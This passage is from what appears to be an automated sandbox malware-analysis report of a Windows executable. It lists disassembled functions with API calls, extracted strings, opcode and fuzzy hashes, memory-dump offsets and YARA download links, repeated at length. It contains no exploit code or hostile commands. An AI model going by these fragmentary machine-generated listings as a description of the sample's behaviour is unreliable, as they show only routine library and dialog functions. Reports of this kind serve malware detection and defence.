                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: ad1a7b5b1ce9bda775b0f0592a5b0baf7b3449056c42f1082e4b8a59de9d0777
                                                                              • Instruction ID: da8a9a66b075db6702cd4bcecd4f3c6a417e6a3693b660636d95e5bd63961486
                                                                              • Opcode Fuzzy Hash: ad1a7b5b1ce9bda775b0f0592a5b0baf7b3449056c42f1082e4b8a59de9d0777
                                                                              • Instruction Fuzzy Hash: 96F0DA70865722DFC601AF18FC828067BA1F72572134B0606F419D7375DB7209518BF9
                                                                              Function 00D32948 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _swprintf
                                                                              • String ID: %ls$%s: %s
                                                                              • API String ID: 589789837-2259941744
                                                                              • Opcode ID: cf329d01378c7c1acf13778cf75160dc0930cae9ee9412d68ccbf68bcb0b863c
                                                                              • Instruction ID: b2479fdba5511406d8035909c51fe6e5984724ce5b360ae3e57df2ff54d78b85
                                                                              • Opcode Fuzzy Hash: cf329d01378c7c1acf13778cf75160dc0930cae9ee9412d68ccbf68bcb0b863c
                                                                              • Instruction Fuzzy Hash: 18518F32EC8304FAEA215B949C02F36B665AF14F06F244916F7CA644E9C6A2D550AF36
                                                                              Function 00D49330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\4.exe,00000104), ref: 00D49370
                                                                              • _free.LIBCMT ref: 00D4943B
                                                                              • _free.LIBCMT ref: 00D49445
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _free$FileModuleName
                                                                              • String ID: C:\Program Files (x86)\4.exe
                                                                              • API String ID: 2506810119-4015062126
                                                                              • Opcode ID: 8a9b46ac67d3bea45f4be7cf8fc1bb08b9bf45fd3f2d5d35adacc5ca8a4efcb4
                                                                              • Instruction ID: 7f0b5d109470a0f7ee3a42192a4b036469023f982f040c6d7ba496ef603356d1
                                                                              • Opcode Fuzzy Hash: 8a9b46ac67d3bea45f4be7cf8fc1bb08b9bf45fd3f2d5d35adacc5ca8a4efcb4
                                                                              • Instruction Fuzzy Hash: 55318C71A00219EFDB21DF9ADC95D9FFBF8EB86720F1440A6F90897241D7709A418BB1
                                                                              Function 00D44366 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D4438B
                                                                              • _abort.LIBCMT ref: 00D44496
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: EncodePointer_abort
                                                                              • String ID: MOC$RCC
                                                                              • API String ID: 948111806-2084237596
                                                                              • Opcode ID: e9440cebed987c7958113bdbcb5b41b03e16a78eaf12e0df5b9a09114d8a1687
                                                                              • Instruction ID: a3295c2c97e91d51f4b1cf2d4b18f0dc71316a8077494875f0eb92612c9f3ae6
                                                                              • Opcode Fuzzy Hash: e9440cebed987c7958113bdbcb5b41b03e16a78eaf12e0df5b9a09114d8a1687
                                                                              • Instruction Fuzzy Hash: E1417C71900209AFCF15DFA8DC81BEE7BB5FF08304F188059F90867221D3759991DB60
                                                                              Function 00D27F1B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00D27F20
                                                                                • Part of subcall function 00D242F1: __EH_prolog.LIBCMT ref: 00D242F6
                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00D27FE5
                                                                                • Part of subcall function 00D28704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00D28713
                                                                                • Part of subcall function 00D28704: GetLastError.KERNEL32 ref: 00D28759
                                                                                • Part of subcall function 00D28704: CloseHandle.KERNEL32(?), ref: 00D28768
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                              • API String ID: 3813983858-639343689
                                                                              • Opcode ID: 2411f423b1bc45a1ebc1b42489a013d44e7866041acda028702755c6669c64cf
                                                                              • Instruction ID: c2d719bd63890d1db713dfb3f7facf97a49b5a2b12d373ba2278a36233d84718
                                                                              • Opcode Fuzzy Hash: 2411f423b1bc45a1ebc1b42489a013d44e7866041acda028702755c6669c64cf
                                                                              • Instruction Fuzzy Hash: 3B31C2319443A4AEDF30EB64AD02BEE7BA9EF24359F044025F804E6295CBB48948DB71
                                                                              Function 00D3BDE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D212F6: GetDlgItem.USER32(00000000,00003021), ref: 00D2133A
                                                                                • Part of subcall function 00D212F6: SetWindowTextW.USER32(00000000,00D545F4), ref: 00D21350
                                                                              • EndDialog.USER32(?,00000001), ref: 00D3BE68
                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D3BE7D
                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D3BE92
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ItemText$DialogWindow
                                                                              • String ID: ASKNEXTVOL
                                                                              • API String ID: 445417207-3402441367
                                                                              • Opcode ID: 530cb023c472f94f2f038c1bed10ab049651f459efb04ebff27c0665aab30150
                                                                              • Instruction ID: ec5378229303c7d2427d81c027e82d45a4ff190ce5a8f1d8423c0be6c1305378
                                                                              • Opcode Fuzzy Hash: 530cb023c472f94f2f038c1bed10ab049651f459efb04ebff27c0665aab30150
                                                                              • Instruction Fuzzy Hash: 7C11E232200221BFD6119F6CEC0AFBA3BA9EB5AB50F080416F740FB2B4C76299059775
                                                                              Function 00D2EC0C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __fprintf_l.LIBCMT ref: 00D2EC74
                                                                              • _strncpy.LIBCMT ref: 00D2ECBA
                                                                                • Part of subcall function 00D330F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D63070,00000200,00D2EC48,00000000,?,00000050,00D63070), ref: 00D33112
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                              • String ID: $%s$@%s
                                                                              • API String ID: 562999700-834177443
                                                                              • Opcode ID: 8a0f50c97f549453dcc2cd4f84a5154f66a337b2f07411bbd097ab9b2d08339e
                                                                              • Instruction ID: 75aeea9eb41a01d8e1192d4cac44a0f3aa4226776ee5910bfad30f77c53baf02
                                                                              • Opcode Fuzzy Hash: 8a0f50c97f549453dcc2cd4f84a5154f66a337b2f07411bbd097ab9b2d08339e
                                                                              • Instruction Fuzzy Hash: 5A219072440318AEEF20EEE4DD42FEF3BA8EF14708F040522F91196191E371D658AB71
                                                                              Function 00D32166 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D2C04A,00000008,?,00000000,?,00D2E685,?,00000000), ref: 00D321A5
                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D2C04A,00000008,?,00000000,?,00D2E685,?,00000000), ref: 00D321AF
                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D2C04A,00000008,?,00000000,?,00D2E685,?,00000000), ref: 00D321BF
                                                                              Strings
                                                                              • Thread pool initialization failed., xrefs: 00D321D7
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                              • String ID: Thread pool initialization failed.
                                                                              • API String ID: 3340455307-2182114853
                                                                              • Opcode ID: b085621c69968e991b7faab647f3ed99c415973993aeb3cd40bcb8036d8e6b74
                                                                              • Instruction ID: 2ca4117d9bea68f119b80e32bc25ab9fc320ecb913ff8ef9b9d452b0518686a7
                                                                              • Opcode Fuzzy Hash: b085621c69968e991b7faab647f3ed99c415973993aeb3cd40bcb8036d8e6b74
                                                                              • Instruction Fuzzy Hash: CC11A3B1A04709AFC3215F7A9C84AA7FBECFB65359F24482EF6D6C3240D67159808B70
                                                                              Function 00D3C460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00D212F6: GetDlgItem.USER32(00000000,00003021), ref: 00D2133A
                                                                                • Part of subcall function 00D212F6: SetWindowTextW.USER32(00000000,00D545F4), ref: 00D21350
                                                                              • EndDialog.USER32(?,00000001), ref: 00D3C4AE
                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 00D3C4C6
                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D3C4F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: ItemText$DialogWindow
                                                                              • String ID: GETPASSWORD1
                                                                              • API String ID: 445417207-3292211884
                                                                              • Opcode ID: 7c236d00102273065b4c62023c7c5a6b6a0e226e73af8113a65a2fb67613b1d1
                                                                              • Instruction ID: 2cade6f62886072a099cb4258931a12f4850355a7b5b608d045def2c751f027e
                                                                              • Opcode Fuzzy Hash: 7c236d00102273065b4c62023c7c5a6b6a0e226e73af8113a65a2fb67613b1d1
                                                                              • Instruction Fuzzy Hash: 7D11C476A20218BADB209A68AD59FFB3B6CEB45714F040021FB45F6184C274E9069775
                                                                              Function 00D3EE2D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                              • API String ID: 0-56093855
                                                                              • Opcode ID: cc8fec66e3fef45fa9423d52f5140a7c53aa8609f8a70e6414e31df68393502f
                                                                              • Instruction ID: 832fbcd6fb4b88645f029c13087af7fa2b9356f989ce356f67505bb951761d9f
                                                                              • Opcode Fuzzy Hash: cc8fec66e3fef45fa9423d52f5140a7c53aa8609f8a70e6414e31df68393502f
                                                                              • Instruction Fuzzy Hash: 81011A72A08345AFDB118F68FC48A577BA9AB05794F140025F949E33F0D6B2EC64DBB1
                                                                              Function 00D24957 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00D2495C
                                                                                • Part of subcall function 00D3FD1D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D3FD29
                                                                                • Part of subcall function 00D3FD1D: ___delayLoadHelper2@8.DELAYIMP ref: 00D3FD4F
                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 00D24967
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
                                                                              • String ID: string too long$vector too long
                                                                              • API String ID: 2355824318-1617939282
                                                                              • Opcode ID: ac7fb4e2696d2acbce28de918515288375230740e1640c3ba1694004b4130b44
                                                                              • Instruction ID: 30cfab5733b49d15f6e7f26b5220b12f0385919af6fed40024f4d21ca6929216
                                                                              • Opcode Fuzzy Hash: ac7fb4e2696d2acbce28de918515288375230740e1640c3ba1694004b4130b44
                                                                              • Instruction Fuzzy Hash: BBF0A7312003146B4664AF59FC4584BB3EDEF95B55710051AFE45C3605D7B0E984CFB2
                                                                              Function 00D4ABDA Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: __alldvrm$_strrchr
                                                                              • String ID:
                                                                              • API String ID: 1036877536-0
                                                                              • Opcode ID: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                              • Instruction ID: e5d19a295f5c03dc7bb190c2208744a0c55a14574a9f6d3885c78ebe11c02bf8
                                                                              • Opcode Fuzzy Hash: afb2700922330d6a2a5e5337cc0ba606ce23cf73aa61dbbfb2679083630104d7
                                                                              • Instruction Fuzzy Hash: AFA13672A807869FDB22CF1CC8917AEBBE5EF15310F18416DE8959B282D7388D41C772
                                                                              Function 00D2B74D Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00D28D5C,?,?,?), ref: 00D2B7F3
                                                                              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00D28D5C,?,?), ref: 00D2B837
                                                                              • SetFileTime.KERNEL32(?,00D28AEC,?,00000000,?,00000800,?,00D28D5C,?,?,?,?,?,?,?,?), ref: 00D2B8B8
                                                                              • CloseHandle.KERNEL32(?,?,00000800,?,00D28D5C,?,?,?,?,?,?,?,?,?,?), ref: 00D2B8BF
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: File$Create$CloseHandleTime
                                                                              • String ID:
                                                                              • API String ID: 2287278272-0
                                                                              • Opcode ID: a1ded890fcea17a4d61e573ed0b133d1f2076bc50b50111514c8632b87d6f19b
                                                                              • Instruction ID: b9298a275f87da66fe4db0f4814321a4798f45178b752f60e54b91bfb1fd6480
                                                                              • Opcode Fuzzy Hash: a1ded890fcea17a4d61e573ed0b133d1f2076bc50b50111514c8632b87d6f19b
                                                                              • Instruction Fuzzy Hash: 4F41F3301483919AE720DF24EC41BAABBE89FA0328F08091EF5D5D31D1D7A49A48DB72
                                                                              Function 00D210E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000009.00000002.1772962722.0000000000D21000.00000020.00000001.01000000.00000010.sdmp, Offset: 00D20000, based on PE: true
                                                                              • Associated: 00000009.00000002.1772935219.0000000000D20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D60000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D67000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D73000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773035878.0000000000D84000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000009.00000002.1773126393.0000000000D85000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_9_2_d20000_4.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen
                                                                              • String ID:
                                                                              • API String ID: 176396367-0
                                                                              • Opcode ID: 1347aeabfe4af0b5878a719b975222fcf429429f757acba6404131e2d91050ee
                                                                              • Instruction ID: c790ae47d61b6d2b7fb049572899933c33bb4918bf9f213339af7bffe1a9ad87
                                                                              • Opcode Fuzzy Hash: 1347aeabfe4af0b5878a719b975222fcf429429f757acba6404131e2d91050ee
                                                                              • Instruction Fuzzy Hash: E741C275A0062A9BCB119F689C09AEEBBB8EF54350F044029FD45F7245DE30AD898BF0
                                                                              Function 00D2851F Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _wcslen.LIBCMT ref: 00D28532
                                                                              • _wcslen.LIBCMT ref: 00D28558
                                                                              • _wcslen.LIBCMT ref: 00D285EF
                                                                              • _wcslen.LIBCMT ref: 00D28657
                                                                                • Part of subcall function 00D2B966: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2B991
                                                                                • Part of subcall function 00D2B41F: RemoveDirectoryW.KERNEL32(?,?,?,00D28649,?), ref: 00D2B430
